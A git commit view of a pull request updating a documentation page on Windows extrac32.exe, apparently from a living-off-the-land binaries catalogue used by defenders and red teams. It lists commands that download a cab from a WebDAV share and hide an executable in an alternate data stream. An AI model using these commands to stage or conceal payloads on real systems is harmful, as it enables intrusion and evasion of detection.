Merge pull request #23 from cssxn/patch-1

Update Extrac32.md
master
Oddvar Moe 2018-05-28 09:29:48 +02:00 committed by GitHub
commit b425f115ad
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 2 deletions

View File

@ -1,6 +1,6 @@
## Extrac32.exe
* Functions: Add ADS, Download
* Functions: Add ADS, Download, Copy
```
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
@ -8,6 +8,8 @@ extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
extrac32 /C c:\sourcefile.txt c:destFile.txt
```
Acknowledgements:
@ -29,7 +31,10 @@ c:\windows\sysWOW64\extrac32.exe
```
Notes:
For help menu
```
extract32 /? | more
```